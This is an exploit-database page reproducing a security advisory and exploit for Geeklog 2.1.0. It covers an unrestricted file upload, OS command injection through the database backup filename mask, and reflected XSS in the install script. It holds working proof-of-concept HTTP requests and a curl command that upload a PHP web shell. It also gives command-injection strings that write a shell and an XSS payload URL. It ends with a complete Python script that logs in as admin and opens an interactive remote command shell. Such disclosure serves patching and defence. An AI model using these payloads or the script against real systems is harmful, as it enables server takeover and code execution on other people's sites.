Lucene search
K

Geeklog 2.1.0 - Multiple Vulnerabilities

🗓️ 10 Dec 2015 00:00:00Reported by Tim CoenType 
zdt
 zdt
🔗 0day.today👁 26 Views

Geeklog 2.1.0 - Multiple Vulnerabilities, Command Injection and File Uploa

Code
Geeklog 2.1.0 - Command Injection, XSS, Command Injection Vulnerabilities

  Overview

The admin area of Geeklog suffers from two vulnerabilities that can lead to
code execution: OS Command Injection and Upload of Files with Dangerous Type.

The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1,
the OS command injection in version 2.1.1b3.

  Upload of Files with Dangerous Type

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file type check is performed only client-side. An
attacker can easily bypass this check and thus upload files of dangerous types,
such as PHP files.

To upload files, an attacker needs a registered user that is in the group
"Filemanager Admin".

Proof of Concept


POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773
Cookie: [cookies]

-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="mode"

add
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"

/var/www/geeklog-2.1.0/public_html/images/
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="filepath"

test.png
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png

<?php passthru($_GET['x'])
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="upload"

Upload
-----------------------------10717364298700964751730232773--

As curl command:


curl -i -s -k  -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \
-b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \
--data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \
'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'

  OS Command Injection

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When performing a database backup, various settings are passed unsanitized to
exec, leading to code execution.

To exploit this issue, an attacker needs a registered user that is in the group
"Root".

Proof of Concept


1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
    geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;"
2. Perform database backup here:
    http://localhost/geeklog-2.1.0/public_html/admin/database.php
    The injected commands will be executed.

In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command
injection is still possible, including the creation of a PHP shell by appending
the injected PHP code to an existing PHP file without closing tags:


    geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"

Code


/admin/database.php
function dobackup()
{
[...]
if (!empty($_CONF['mysqldump_filename_mask'])) {
    $filename_mask = strftime($_CONF['mysqldump_filename_mask']);
}
[...]
$backupfile = $_CONF['backup_path'] . $filename_mask;
[...]
$command .= " $_DB_name > \"$backupfile\"";
[...]
if ($canExec) {
    exec($command);

5. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:

https://www.geeklog.net/filemgmt/visit.php/1156

Please note that a newer version might already be available.


--------------------------------------------------

Geeklog 2.1.0 Cross Site Scripting

Description

There is at least one XSS vulnerability in the installation script of Geeklog.

Geeklog recommends to delete the install directory and displays warnings in the
admin area if this is not the case. However, deleting the install directory is
not mandatory, so it should be assumed that not all users will delete it.

  Proof of Concept


http://localhost/geeklog-2.1.0/public_html/admin/install/bigdump.php?foffset=1&start=1&fn=te<script>alert(1)</script>st.sql

$_REQUEST['site_url'], $_REQUEST['site_admin_url'], and $_SERVER['PHP_SELF']
may be vulnerable as well, but the attacker would need a valid sql backup file
to trigger them.

  Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:

https://www.geeklog.net/filemgmt/visit.php/1156

Please note that a newer version might already be available.

--------------------------------------------------------

Geeklog 2.1.0 Command Injection Exploit

#!/usr/local/bin/python
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/moderation.php"
configPath = "/admin/configuration.php?tab-5"
backupPath = "/admin/database.php"

shellFileName = "404.php"
shellContent = "<?php passthru(\$_GET['x']);"

def login(requestSession, url, username, password):
    postData = {"mode": "login", "warn": "1", "loginname": username, "passwd": password}
    loginResult = requestSession.post(url, data = postData).text
    return "Incorrect Login Information" not in loginResult and "You have exceeded the number of allowed login attempts" not in loginResult

def getCSRFToken(requestSession, url):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="_glsectoken" value="(.*)" />', csrfRequest.text)
    return csrfTokenRegEx.group(1)

def injectCommand(requestSession, url):
    csrfToken = getCSRFToken(requestSession, url)
    postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group": "0", "form_submit": "true", "mysqldump_filename_mask": 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' + shellFileName + ';"'}
    requestSession.post(url, data = postData)

def executeCommand(requestSession, url):
    csrfToken = getCSRFToken(requestSession, url)

    requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken)

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")

requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: could not log in")

print("injecting command")
injectCommand(requestSession, url + configPath)

print("executing command")
executeCommand(requestSession, url + backupPath)

runShell(url + "/admin/" + shellFileName + "?x=")


Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation